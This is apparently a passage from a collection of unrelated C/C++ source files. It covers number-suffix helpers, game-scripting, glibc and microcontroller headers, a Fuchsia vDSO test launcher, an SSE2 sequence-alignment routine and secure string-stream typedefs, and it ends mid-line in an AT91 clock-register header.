operator<<(std::ostream& out, const TDiskUsage& obj); }}}}}} // namespace #endif
//////////////////////////////////////////////////////////////////////// // // Copyright 2014 PMC-Sierra, Inc. // // This program is free software; you can redistribute it and/or // modify it under the terms of the GNU General Public License // as published by the Free Software Foundation; either version 2 // of the License, or (at your option) any later version. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with this program; if not, write to the Free Software // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. // //////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// // // Author: Logan Gunthorpe // // Date: Oct 23 2014 // // Description: // Functions for dealing with number suffixes // //////////////////////////////////////////////////////////////////////// #include "suffix.h" #include <stdlib.h> #include <ctype.h> #include <errno.h> #include <math.h> static struct si_suffix { double magnitude; const char *suffix; } si_suffixes[] = { {1e15, "P"}, {1e12, "T"}, {1e9, "G"}, {1e6, "M"}, {1e3, "k"}, {1e0, ""}, {1e-3, "m"}, {1e-6, "u"}, {1e-9, "n"}, {1e-12, "p"}, {1e-15, "f"}, {0} }; const char *suffix_si_get(double *value) { struct si_suffix *s; for (s = si_suffixes; s->magnitude != 0; s++) { if (*value >= s->magnitude) { *value /= s->magnitude; return s->suffix; } } return ""; } static struct binary_suffix { int shift; const char *suffix; } binary_suffixes[] = { {50, "Pi"}, {40, "Ti"}, {30, "Gi"}, {20, "Mi"}, {10, "Ki"}, {0, ""} }; const char *suffix_binary_get(long long *value) { struct binary_suffix *s; for (s = binary_suffixes; s->shift != 0; s++) { if (llabs(*value) >= (1LL << s->shift)) { *value = (*value + (1 << (s->shift - 1))) / (1 << s->shift); return s->suffix; } } return ""; } const char *suffix_dbinary_get(double *value) { struct binary_suffix *s; for (s = binary_suffixes; s->shift != 0; s++) { if (fabs(*value) >= (1LL << s->shift)) { *value = *value / (1 << s->shift); return s->suffix; } } return ""; } long long suffix_binary_parse(const char *value) { char *suffix; errno = 0; long long ret = strtol(value, &suffix, 0); if (errno) return 0; struct binary_suffix *s; for (s = binary_suffixes; s->shift != 0; s++) { if (tolower(suffix[0]) == tolower(s->suffix[0])) { ret <<= s->shift; return ret; } } if (suffix[0] != '\0') errno = EINVAL; return ret; }
#pragma once #include "GameTypes.h" #include "PapyrusArgs.h" class TESObjectREFR; class TESForm; class EnchantmentItem; class VMClassRegistry; class EffectSetting; class BGSListForm; namespace papyrusObjectReference { void RegisterFuncs(VMClassRegistry* registry); UInt32 GetNumItems(TESObjectREFR* pContainerRef); TESForm* GetNthForm(TESObjectREFR* pContainerRef, UInt32 n); float GetTotalItemWeight(TESObjectREFR* pContainerRef); float GetTotalArmorWeight(TESObjectREFR* pContainerRef); void SetItemHealthPercent(TESObjectREFR* object, float value); float GetItemCharge(TESObjectREFR* object); float GetItemMaxCharge(TESObjectREFR* object); void SetItemCharge(TESObjectREFR* object, float value); EnchantmentItem * GetEnchantment(TESObjectREFR* object); void CreateEnchantment(TESObjectREFR* object, float maxCharge, VMArray<EffectSetting*> effects, VMArray<float> magnitudes, VMArray<UInt32> areas, VMArray<UInt32> durations); void SetEnchantment(TESObjectREFR* object, EnchantmentItem * form, float maxCharge); void ResetInventory(TESObjectREFR * obj); bool IsOffLimits(TESObjectREFR * obj); BSFixedString GetDisplayName(TESObjectREFR* object); bool SetDisplayName(TESObjectREFR* object, BSFixedString value, bool force); TESObjectREFR * GetEnableParent(TESObjectREFR* object); bool IsHarvested(TESObjectREFR* pProduceRef); bool HasNiNode(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodePositionX(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodePositionY(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodePositionZ(TESObjectREFR * obj, BSFixedString nodeName); float GetNiNodeScale(TESObjectREFR * obj, BSFixedString nodeName); void SetNiNodeScale(TESObjectREFR * obj, BSFixedString nodeName, float value); void GetAllForms(TESObjectREFR* pContainerRef, BGSListForm * list); }
/* Copyright (C) 1996-2016 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library. If not, see <http://www.gnu.org/licenses/>. */ #ifndef _NETDB_H # error "Never include <bits/netdb.h> directly; use <netdb.h> instead." #endif /* Description of data base entry for a single network. NOTE: here a poor assumption is made. The network number is expected to fit into an unsigned long int variable. */ struct netent { char *n_name; /* Official name of network. */ char **n_aliases; /* Alias list. */ int n_addrtype; /* Net address type. */ /* XXX We should probably use uint32_t for the field and ensure compatibility by adding appropriate padding. */ unsigned long int n_net; /* Network number. */ };
// Copyright 2017 The Fuchsia Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include <fcntl.h> #include <launchpad/launchpad.h> #include <zircon/syscalls.h> #include <zircon/status.h> #include <lib/fdio/io.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define VDSO_FILE "/boot/kernel/vdso/test1" int main(void) { int fd = open(VDSO_FILE, O_RDONLY); if (fd < 0) { printf("%s: %m\n", VDSO_FILE); return 1; } zx_handle_t vdso_vmo_noexec; zx_handle_t vdso_vmo; zx_status_t status = fdio_get_vmo_exact(fd, &vdso_vmo_noexec); close(fd); if (status != ZX_OK) { printf("fdio_get_vmo_exact(%d): %s\n", fd, zx_status_get_string(status)); return status; } status = zx_vmo_replace_as_executable(vdso_vmo_noexec, ZX_HANDLE_INVALID, &vdso_vmo); if (status != ZX_OK) { printf("zx_vmo_replace_as_executable(%u, ZX_HANDLE_INVALID, *res): %s\n", vdso_vmo_noexec, zx_status_get_string(status)); return status; } launchpad_set_vdso_vmo(vdso_vmo); launchpad_t* lp; launchpad_create(ZX_HANDLE_INVALID, "vdso-variant-helper", &lp); launchpad_clone(lp, LP_CLONE_ALL); launchpad_set_args(lp, 1, (const char*[]){"vdso-variant-helper"}); const char* root_dir = getenv("TEST_ROOT_DIR"); if (root_dir == NULL) { root_dir = ""; } static const char kHelperPath[] = "/bin/vdso-variant-helper"; char path[strlen(root_dir) + strlen(kHelperPath) + 1]; strcpy(path, root_dir); strcat(path, kHelperPath); launchpad_load_from_file(lp, path); zx_handle_t proc; const char* errmsg; status = launchpad_go(lp, &proc, &errmsg); if (status != ZX_OK) { printf("launchpad_go: %s\n", errmsg); return status; } status = zx_object_wait_one(proc, ZX_PROCESS_TERMINATED, ZX_TIME_INFINITE, NULL); if (status != ZX_OK) { printf("zx_object_wait_one: %s\n", zx_status_get_string(status)); return status; } zx_info_process_t info; status = zx_object_get_info(proc, ZX_INFO_PROCESS, &info, sizeof(info), NULL, NULL); if (status != ZX_OK) { printf("zx_object_get_info: %s\n", zx_status_get_string(status)); return status; } return info.return_code; }
/** ****************************************************************************** * @file EXTI/EXTI_Example/stm32f4xx_it.h * @author MCD Application Team * @version V1.1.0 * @date 18-January-2013 * @brief This file contains the headers of the interrupt handlers. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT 2013 STMicroelectronics</center></h2> * * Licensed under MCD-ST Liberty SW License Agreement V2, (the "License"); * You may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.st.com/software_license_agreement_liberty_v2 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * ****************************************************************************** */ /* Define to prevent recursive inclusion -------------------------------------*/ #ifndef __STM32F4xx_IT_H #define __STM32F4xx_IT_H #ifdef __cplusplus extern "C" { #endif /* Includes ------------------------------------------------------------------*/ #include "stm32f4xx.h" /* Exported types ------------------------------------------------------------*/ /* Exported constants --------------------------------------------------------*/ /* Exported macro ------------------------------------------------------------*/ /* Exported functions ------------------------------------------------------- */ void NMI_Handler(void); void HardFault_Handler(void); void MemManage_Handler(void); void BusFault_Handler(void); void UsageFault_Handler(void); void SVC_Handler(void); void DebugMon_Handler(void); void PendSV_Handler(void); void SysTick_Handler(void); #ifdef __cplusplus } #endif #endif /* __STM32F4xx_IT_H */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
/** * @file * * @author jeffrey.daily@gmail.com * * Copyright (c) 2015 Battelle Memorial Institute. */ #include "config.h" #include <stdint.h> #include <stdlib.h> #if defined(_MSC_VER) #include <intrin.h> #else #include <emmintrin.h> #endif #include "parasail.h" #include "parasail/memory.h" #include "parasail/internal_sse.h" #ifdef PARASAIL_TABLE static inline void arr_store_si128( int *array, __m128i vH, int32_t t, int32_t seglen, int32_t d, int32_t dlen) { array[1LL*(0*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 0); array[1LL*(1*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 1); array[1LL*(2*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 2); array[1LL*(3*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 3); array[1LL*(4*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 4); array[1LL*(5*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 5); array[1LL*(6*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 6); array[1LL*(7*seglen+t)*dlen + d] = (int16_t)_mm_extract_epi16(vH, 7); } #endif #ifdef PARASAIL_ROWCOL static inline void arr_store_col( int *col, __m128i vH, int32_t t, int32_t seglen) { col[0*seglen+t] = (int16_t)_mm_extract_epi16(vH, 0); col[1*seglen+t] = (int16_t)_mm_extract_epi16(vH, 1); col[2*seglen+t] = (int16_t)_mm_extract_epi16(vH, 2); col[3*seglen+t] = (int16_t)_mm_extract_epi16(vH, 3); col[4*seglen+t] = (int16_t)_mm_extract_epi16(vH, 4); col[5*seglen+t] = (int16_t)_mm_extract_epi16(vH, 5); col[6*seglen+t] = (int16_t)_mm_extract_epi16(vH, 6); col[7*seglen+t] = (int16_t)_mm_extract_epi16(vH, 7); } #endif #ifdef PARASAIL_TABLE #define FNAME parasail_nw_table_scan_sse2_128_16 #define PNAME parasail_nw_table_scan_profile_sse2_128_16 #else #ifdef PARASAIL_ROWCOL #define FNAME parasail_nw_rowcol_scan_sse2_128_16 #define PNAME parasail_nw_rowcol_scan_profile_sse2_128_16 #else #define FNAME parasail_nw_scan_sse2_128_16 #define PNAME parasail_nw_scan_profile_sse2_128_16 #endif #endif parasail_result_t* FNAME( const char * const restrict s1, const int s1Len, const char * const restrict s2, const int s2Len, const int open, const int gap, const parasail_matrix_t *matrix) { parasail_profile_t *profile = parasail_profile_create_sse_128_16(s1, s1Len, matrix); parasail_result_t *result = PNAME(profile, s2, s2Len, open, gap); parasail_profile_free(profile); return result; } parasail_result_t* PNAME( const parasail_profile_t * const restrict profile, const char * const restrict s2, const int s2Len, const int open, const int gap) { int32_t i = 0; int32_t j = 0; int32_t k = 0; const int s1Len = profile->s1Len; int32_t end_query = s1Len-1; int32_t end_ref = s2Len-1; const parasail_matrix_t *matrix = profile->matrix; const int32_t segWidth = 8; /* number of values in vector unit */ const int32_t segLen = (s1Len + segWidth - 1) / segWidth; const int32_t offset = (s1Len - 1) % segLen; const int32_t position = (segWidth - 1) - (s1Len - 1) / segLen; __m128i* const restrict pvP = (__m128i*)profile->profile16.score; __m128i* const restrict pvE = parasail_memalign___m128i(16, segLen); int16_t* const restrict boundary = parasail_memalign_int16_t(16, s2Len+1); __m128i* const restrict pvHt= parasail_memalign___m128i(16, segLen); __m128i* const restrict pvH = parasail_memalign___m128i(16, segLen); __m128i* const restrict pvGapper = parasail_memalign___m128i(16, segLen); __m128i vGapO = _mm_set1_epi16(open); __m128i vGapE = _mm_set1_epi16(gap); const int16_t NEG_LIMIT = (-open < matrix->min ? INT16_MIN + open : INT16_MIN - matrix->min) + 1; const int16_t POS_LIMIT = INT16_MAX - matrix->max - 1; __m128i vZero = _mm_setzero_si128(); int16_t score = NEG_LIMIT; __m128i vNegLimit = _mm_set1_epi16(NEG_LIMIT); __m128i vPosLimit = _mm_set1_epi16(POS_LIMIT); __m128i vSaturationCheckMin = vPosLimit; __m128i vSaturationCheckMax = vNegLimit; __m128i vNegInfFront = vZero; __m128i vSegLenXgap; #ifdef PARASAIL_TABLE parasail_result_t *result = parasail_result_new_table1(segLen*segWidth, s2Len); #else #ifdef PARASAIL_ROWCOL parasail_result_t *result = parasail_result_new_rowcol1(segLen*segWidth, s2Len); #else parasail_result_t *result = parasail_result_new(); #endif #endif vNegInfFront = _mm_insert_epi16(vNegInfFront, NEG_LIMIT, 0); vSegLenXgap = _mm_add_epi16(vNegInfFront, _mm_slli_si128(_mm_set1_epi16(-segLen*gap), 2)); /* initialize H and E */ { int32_t index = 0; for (i=0; i<segLen; ++i) { int32_t segNum = 0; __m128i_16_t h; __m128i_16_t e; for (segNum=0; segNum<segWidth; ++segNum) { int64_t tmp = -open-gap*(segNum*segLen+i); h.v[segNum] = tmp < INT16_MIN ? INT16_MIN : tmp; tmp = tmp - open; e.v[segNum] = tmp < INT16_MIN ? INT16_MIN : tmp; } _mm_store_si128(&pvH[index], h.m); _mm_store_si128(&pvE[index], e.m); ++index; } } /* initialize uppder boundary */ { boundary[0] = 0; for (i=1; i<=s2Len; ++i) { int64_t tmp = -open-gap*(i-1); boundary[i] = tmp < INT16_MIN ? INT16_MIN : tmp; } } { __m128i vGapper = _mm_sub_epi16(vZero,vGapO); for (i=segLen-1; i>=0; --i) { _mm_store_si128(pvGapper+i, vGapper); vGapper = _mm_sub_epi16(vGapper, vGapE); } } /* outer loop over database sequence */ for (j=0; j<s2Len; ++j) { __m128i vE; __m128i vHt; __m128i vF; __m128i vH; __m128i vHp; __m128i *pvW; __m128i vW; /* calculate E */ /* calculate Ht */ /* calculate F and H first pass */ vHp = _mm_load_si128(pvH+(segLen-1)); vHp = _mm_slli_si128(vHp, 2); vHp = _mm_insert_epi16(vHp, boundary[j], 0); pvW = pvP + matrix->mapper[(unsigned char)s2[j]]*segLen; vHt = _mm_sub_epi16(vNegLimit, pvGapper[0]); vF = vNegLimit; for (i=0; i<segLen; ++i) { vH = _mm_load_si128(pvH+i); vE = _mm_load_si128(pvE+i); vW = _mm_load_si128(pvW+i); vE = _mm_max_epi16( _mm_sub_epi16(vE, vGapE), _mm_sub_epi16(vH, vGapO)); vHp = _mm_add_epi16(vHp, vW); vF = _mm_max_epi16(vF, _mm_add_epi16(vHt, pvGapper[i])); vHt = _mm_max_epi16(vE, vHp); _mm_store_si128(pvE+i, vE); _mm_store_si128(pvHt+i, vHt); vHp = vH; } /* pseudo prefix scan on F and H */ vHt = _mm_slli_si128(vHt, 2); vHt = _mm_insert_epi16(vHt, boundary[j+1], 0); vF = _mm_max_epi16(vF, _mm_add_epi16(vHt, pvGapper[0])); for (i=0; i<segWidth-2; ++i) { __m128i vFt = _mm_slli_si128(vF, 2); vFt = _mm_add_epi16(vFt, vSegLenXgap); vF = _mm_max_epi16(vF, vFt); } /* calculate final H */ vF = _mm_slli_si128(vF, 2); vF = _mm_add_epi16(vF, vNegInfFront); vH = _mm_max_epi16(vHt, vF); for (i=0; i<segLen; ++i) { vHt = _mm_load_si128(pvHt+i); vF = _mm_max_epi16( _mm_sub_epi16(vF, vGapE), _mm_sub_epi16(vH, vGapO)); vH = _mm_max_epi16(vHt, vF); _mm_store_si128(pvH+i, vH); vSaturationCheckMin = _mm_min_epi16(vSaturationCheckMin, vH); vSaturationCheckMax = _mm_max_epi16(vSaturationCheckMax, vH); #ifdef PARASAIL_TABLE arr_store_si128(result->tables->score_table, vH, i, segLen, j, s2Len); #endif } #ifdef PARASAIL_ROWCOL /* extract last value from the column */ { vH = _mm_load_si128(pvH + offset); for (k=0; k<position; ++k) { vH = _mm_slli_si128(vH, 2); } result->rowcols->score_row[j] = (int16_t) _mm_extract_epi16 (vH, 7); } #endif } #ifdef PARASAIL_ROWCOL for (i=0; i<segLen; ++i) { __m128i vH = _mm_load_si128(pvH+i); arr_store_col(result->rowcols->score_col, vH, i, segLen); } #endif /* extract last value from the last column */ { __m128i vH = _mm_load_si128(pvH + offset); for (k=0; k<position; ++k) { vH = _mm_slli_si128(vH, 2); } score = (int16_t) _mm_extract_epi16 (vH, 7); } if (_mm_movemask_epi8(_mm_or_si128( _mm_cmplt_epi16(vSaturationCheckMin, vNegLimit), _mm_cmpgt_epi16(vSaturationCheckMax, vPosLimit)))) { result->flag |= PARASAIL_FLAG_SATURATED; score = 0; end_query = 0; end_ref = 0; } result->score = score; result->end_query = end_query; result->end_ref = end_ref; result->flag |= PARASAIL_FLAG_NW | PARASAIL_FLAG_SCAN | PARASAIL_FLAG_BITS_16 | PARASAIL_FLAG_LANES_8; #ifdef PARASAIL_TABLE result->flag |= PARASAIL_FLAG_TABLE; #endif #ifdef PARASAIL_ROWCOL result->flag |= PARASAIL_FLAG_ROWCOL; #endif parasail_free(pvGapper); parasail_free(pvH); parasail_free(pvHt); parasail_free(boundary); parasail_free(pvE); return result; }
/* * Copyright (c) 2003-2020 Rony Shapiro <ronys@pwsafe.org>. * All rights reserved. Use of the code is allowed under the * Artistic License 2.0 terms, as specified in the LICENSE file * distributed with this code, or available from * http://www.opensource.org/licenses/artistic-license-2.0.php */ /** * \file StringXStream.h * * STL-based implementation of secure string streams. * typedefs of secure versions of istringstream, ostringstream * and stringbuf. * Secure in the sense that memory is scrubbed before * being returned to system. */ #ifndef __STRINGXSTREAM_H #define __STRINGXSTREAM_H #include "StringX.h" #include <sstream> // stringstream typedefs for StringX typedef std::basic_stringbuf<wchar_t, std::char_traits<wchar_t>, S_Alloc::SecureAlloc<wchar_t> > wStringXBuf; typedef std::basic_istringstream<wchar_t, std::char_traits<wchar_t>, S_Alloc::SecureAlloc<wchar_t> > wiStringXStream; typedef std::basic_ostringstream<wchar_t, std::char_traits<wchar_t>, S_Alloc::SecureAlloc<wchar_t> > woStringXStream; typedef std::basic_stringstream<wchar_t, std::char_traits<wchar_t>, S_Alloc::SecureAlloc<wchar_t> > wStringXStream; typedef std::basic_stringbuf<char, std::char_traits<char>, S_Alloc::SecureAlloc<char> > cStringXBuf; typedef std::basic_istringstream<char, std::char_traits<char>, S_Alloc::SecureAlloc<char> > ciStringXStream; typedef std::basic_ostringstream<char, std::char_traits<char>, S_Alloc::SecureAlloc<char> > coStringXStream; typedef std::basic_stringstream<char, std::char_traits<char>, S_Alloc::SecureAlloc<char> > cStringXStream; typedef wStringXBuf StringXBuf; typedef wiStringXStream iStringXStream; typedef woStringXStream oStringXStream; typedef wStringXStream StringXStream; // Following not related to StringX, but putting it here // is the lesser of two evils (other is creating a new file // just for this) typedef std::wistringstream istringstreamT; typedef std::wostringstream ostringstreamT; typedef std::wstringstream stringstreamT; #endif /* __STRINGXSTREAM_H */ //----------------------------------------------------------------------------- // Local variables: // mode: c++ // End:
// Copyright (c) 2020 The Globaltoken Core developers // Distributed under the MIT software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef BITCOIN_RPC_TREASURY_H #define BITCOIN_RPC_TREASURY_H #include <stdint.h> #include <script/standard.h> class UniValue; class CTreasuryProposal; class CScript; /** Sign the treasury transaction partially */ UniValue SignTreasuryTransactionPartially(CTreasuryProposal& tpsl, CBasicKeyStore *keystore, const UniValue& hashType); /** Treasury Mempool information to JSON */ UniValue treasurymempoolInfoToJSON(); /** Treasury Proposal to JSON */ UniValue proposaltoJSON(const CTreasuryProposal* proposal, int decodeProposalTX); /** Compute Proposal Tx Amount data */ UniValue GetProposalTxInfo(const CTreasuryProposal* pProposal); /** Check if the treasury change address if a valid script address */ bool IsTreasuryChangeAddrValid(const CScript& scriptTreasuryChange, CTxDestination &txDestination); #endif // BITCOIN_RPC_TREASURY_H
/* * [origin: Linux kernel arch/arm/mach-at91/include/mach/at91_pmc.h] * * Copyright (C) 2005 Ivan Kokshaysky * Copyright (C) SAN People * Copyright (C) 2009 Jens Scharsig (js_at_ng@scharsoft.de) * * Power Management Controller (PMC) - System peripherals registers. * Based on AT91RM9200 datasheet revision E. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. */ #ifndef AT91_PMC_H #define AT91_PMC_H #define AT91_ASM_PMC_MOR (ATMEL_BASE_PMC + 0x20) #define AT91_ASM_PMC_PLLAR (ATMEL_BASE_PMC + 0x28) #define AT91_ASM_PMC_PLLBR (ATMEL_BASE_PMC + 0x2c) #define AT91_ASM_PMC_MCKR (ATMEL_BASE_PMC + 0x30) #define AT91_ASM_PMC_SR (ATMEL_BASE_PMC + 0x68) #ifndef __ASSEMBLY__ #include <asm/types.h> typedef struct at91_pmc { u32 scer; /* 0x00 System Clock Enable Register */ u32 scdr; /* 0x04 System Clock Disable Register */ u32 scsr; /* 0x08 System Clock Status Register */ u32 reserved0; u32 pcer; /* 0x10 Peripheral Clock Enable Register */ u32 pcdr; /* 0x14 Peripheral Clock Disable Register */ u32 pcsr; /* 0x18 Peripheral Clock Status Register */ u32 uckr; /* 0x1C UTMI Clock Register */ u32 mor; /* 0x20 Main Oscilator Register */ u32 mcfr; /* 0x24 Main Clock Frequency Register */ u32 pllar; /* 0x28 PLL A Register */ u32 pllbr; /* 0x2C PLL B Register */ u32 mckr; /* 0x30 Master Clock Register */ u32 reserved1; u32 usb; /* 0x38 USB Clock Register */ u32 reserved2; u32 pck[4]; /* 0x40 Programmable Clock Register 0 - 3 */ u32 reserved3[4]; u32 ier; /* 0x60 Interrupt Enable Register */ u32 idr; /* 0x64 Interrupt Disable Register */ u32 sr; /* 0x68 Status Register */ u32 imr; /* 0x6C Interrupt Mask Register */ u32 reserved4[4]; u32 pllicpr; /* 0x80 Change Pump Current Register (SAM9) */ u32 reserved5[21]; u32 wpmr; /* 0xE4 Write Protect Mode Register (CAP0) */ u32 wpsr; /* 0xE8 Write Protect Status Register (CAP0) */ u32 reserved8[5]; } at91_pmc_t; #endif /* end not assembly */ #define AT91_PMC_MOR_MOSCEN 0x01 #define AT91_PMC_MOR_OSCBYPASS 0x02 #define AT91_PMC_MOR_OSCOUNT(x) ((x & 0xff) << 8) #define AT91_PMC_PLLXR_DIV(x) (x & 0xFF) #define AT91_PMC_PLLXR_PLLCOUNT(x) ((x & 0x3F) << 8) #define AT91_PMC_PLLXR_OUT(x) ((x & 0x03) << 14) #define AT91_PMC_PLLXR_MUL(x) ((x & 0x7FF) << 16) #define AT91_PMC_PLLAR_29 0x20000000 #define AT91_PMC_PLLBR_USBDIV_1 0x00000000 #define AT91_PMC_PLLBR_USBDIV_2 0x10000000 #define AT91_PMC_PLLBR_USBDIV_4 0x20000000 #define AT91_PMC_MCFR_MAINRDY 0x00010000 #define AT91_PMC_MCFR_MAINF_MASK 0x0000FFFF #define AT91_PMC_MCKR_CSS_SLOW 0x00000000 #define AT91_PMC_MCKR_CSS_MAIN 0x00000001 #define AT91_PMC_MCKR_CSS_PLLA 0x00000002 #define AT91_PMC_MCKR_CSS_PLLB 0x00000003 #define AT91_PMC_MCKR_CSS_MASK 0x00000003 #define AT91_PMC_MCKR_PRES_1 0x00000000 #define AT91_PMC_MCKR_PRES_2 0x00000004 #define AT91_PMC_MCKR_PRES_4 0x00000008 #define AT91_PMC_MCKR_PRES_8 0x0000000C #define AT91_PMC_MCKR_PRES_16 0x00000010 #define AT91_PMC_MCKR_PRES_32 0x00000014 #define AT91_PMC_MCKR_PRES_64 0x00000018 #define AT91_PMC_MCKR_PRES_MASK 0x0000001C #ifdef CONFIG_AT91RM9200 #define AT91_PMC_MCKR_MDIV_1 0x00000000 #define AT91_PMC_MCKR_MDIV_2 0x00000100 #define AT91_PMC_MCKR_MDIV_3 0x00000200 #define AT91_PMC_MCKR_MDIV_4 0x00000300 #define AT91_PMC_MCKR_MDIV_MASK 0x00000300 #else #define AT91_PMC_MCKR_MDIV_1 0x00000000 #define AT91_PMC_MCKR_MDIV_2 0x00000100 #define AT91_PMC_MCKR_MDIV_4 0x00000200 #define AT91_PMC_MCKR_MDIV_MASK 0x00000300 #endif #define AT91_PMC_MCKR_PLLADIV_1 0x00001000 #define AT91_PMC_MCKR_PLLADIV_2 0x00002000 #define AT91_PMC_IXR_MOSCS 0x00000001 #define AT91_PMC_IXR_LOCKA 0x00000002 #define AT91_PMC_IXR_LOCKB 0x00000004 #define AT91_PMC_IXR_MCKRDY 0x00000008 #define AT91_PMC_IXR_LOCKU 0x00000040 #define AT91_PMC_IXR_PCKRDY0 0x00000100 #define AT91_PMC_IXR_PCKRDY1 0x00000200 #define AT91_PMC_IXR_PCKRDY2 0x00000400 #define AT91_PMC_IXR_PCKRDY3 0x00000800 #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_SCER (AT91_PMC + 0x00) /* System Clock Enable Register */ #define AT91_PMC_SCDR (AT91_PMC + 0x04) /* System Clock Disable Register */ #define AT91_PMC_SCSR (AT91_PMC + 0x08) /* System Clock Status Register */ #endif #define AT91_PMC_PCK (1 << 0) /* Processor Clock */ #define AT91RM9200_PMC_UDP (1 << 1) /* USB Devcice Port Clock [AT91RM9200 only] */ #define AT91RM9200_PMC_MCKUDP (1 << 2) /* USB Device Port Master Clock Automatic Disable on Suspend [AT91RM9200 only] */ #define AT91CAP9_PMC_DDR (1 << 2) /* DDR Clock [AT91CAP9 revC only] */ #define AT91RM9200_PMC_UHP (1 << 4) /* USB Host Port Clock [AT91RM9200 only] */ #define AT91SAM926x_PMC_UHP (1 << 6) /* USB Host Port Clock [AT91SAM926x only] */ #define AT91CAP9_PMC_UHP (1 << 6) /* USB Host Port Clock [AT91CAP9 only] */ #define AT91SAM926x_PMC_UDP (1 << 7) /* USB Devcice Port Clock [AT91SAM926x only] */ #define AT91_PMC_PCK0 (1 << 8) /* Programmable Clock 0 */ #define AT91_PMC_PCK1 (1 << 9) /* Programmable Clock 1 */ #define AT91_PMC_PCK2 (1 << 10) /* Programmable Clock 2 */ #define AT91_PMC_PCK3 (1 << 11) /* Programmable Clock 3 */ #define AT91_PMC_HCK0 (1 << 16) /* AHB Clock (USB host) [AT91SAM9261 only] */ #define AT91_PMC_HCK1 (1 << 17) /* AHB Clock (LCD) [AT91SAM9261 only] */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_PCER (AT91_PMC + 0x10) /* Peripheral Clock Enable Register */ #define AT91_PMC_PCDR (AT91_PMC + 0x14) /* Peripheral Clock Disable Register */ #define AT91_PMC_PCSR (AT91_PMC + 0x18) /* Peripheral Clock Status Register */ #define AT91_CKGR_UCKR (AT91_PMC + 0x1C) /* UTMI Clock Register [SAM9RL, CAP9] */ #endif #define AT91_PMC_UPLLEN (1 << 16) /* UTMI PLL Enable */ #define AT91_PMC_UPLLCOUNT (0xf << 20) /* UTMI PLL Start-up Time */ #define AT91_PMC_BIASEN (1 << 24) /* UTMI BIAS Enable */ #define AT91_PMC_BIASCOUNT (0xf << 28) /* UTMI PLL Start-up Time */ #ifdef CONFIG_AT91_LEGACY #define AT91_CKGR_MOR (AT91_PMC + 0x20) /* Main Oscillator Register [not on SAM9RL] */ #endif #define AT91_PMC_MOSCEN (1 << 0) /* Main Oscillator Enable */ #define AT91_PMC_OSCBYPASS (1 << 1) /* Oscillator Bypass [SAM9x, CAP9] */ #define AT91_PMC_OSCOUNT (0xff << 8) /* Main Oscillator Start-up Time */ #ifdef CONFIG_AT91_LEGACY #define AT91_CKGR_MCFR (AT91_PMC + 0x24) /* Main Clock Frequency Register */ #endif #define AT91_PMC_MAINF (0xffff << 0) /* Main Clock Frequency */ #define AT91_PMC_MAINRDY (1 << 16) /* Main Clock Ready */ #ifdef CONFIG_AT91_LEGACY #define AT91_CKGR_PLLAR (AT91_PMC + 0x28) /* PLL A Register */ #define AT91_CKGR_PLLBR (AT91_PMC + 0x2c) /* PLL B Register */ #endif #define AT91_PMC_DIV (0xff << 0) /* Divider */ #define AT91_PMC_PLLCOUNT (0x3f << 8) /* PLL Counter */ #define AT91_PMC_OUT (3 << 14) /* PLL Clock Frequency Range */ #define AT91_PMC_MUL (0x7ff << 16) /* PLL Multiplier */ #define AT91_PMC_USBDIV (3 << 28) /* USB Divisor (PLLB only) */ #define AT91_PMC_USBDIV_1 (0 << 28) #define AT91_PMC_USBDIV_2 (1 << 28) #define AT91_PMC_USBDIV_4 (2 << 28) #define AT91_PMC_USB96M (1 << 28) /* Divider by 2 Enable (PLLB only) */ #define AT91_PMC_PLLA_WR_ERRATA (1 << 29) /* Bit 29 must always be set to 1 when programming the CKGR_PLLAR register */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_MCKR (AT91_PMC + 0x30) /* Master Clock Register */ #endif #define AT91_PMC_CSS (3 << 0) /* Master Clock Selection */ #define AT91_PMC_CSS_SLOW (0 << 0) #define AT91_PMC_CSS_MAIN (1 << 0) #define AT91_PMC_CSS_PLLA (2 << 0) #define AT91_PMC_CSS_PLLB (3 << 0) #define AT91_PMC_PRES (7 << 2) /* Master Clock Prescaler */ #define AT91_PMC_PRES_1 (0 << 2) #define AT91_PMC_PRES_2 (1 << 2) #define AT91_PMC_PRES_4 (2 << 2) #define AT91_PMC_PRES_8 (3 << 2) #define AT91_PMC_PRES_16 (4 << 2) #define AT91_PMC_PRES_32 (5 << 2) #define AT91_PMC_PRES_64 (6 << 2) #define 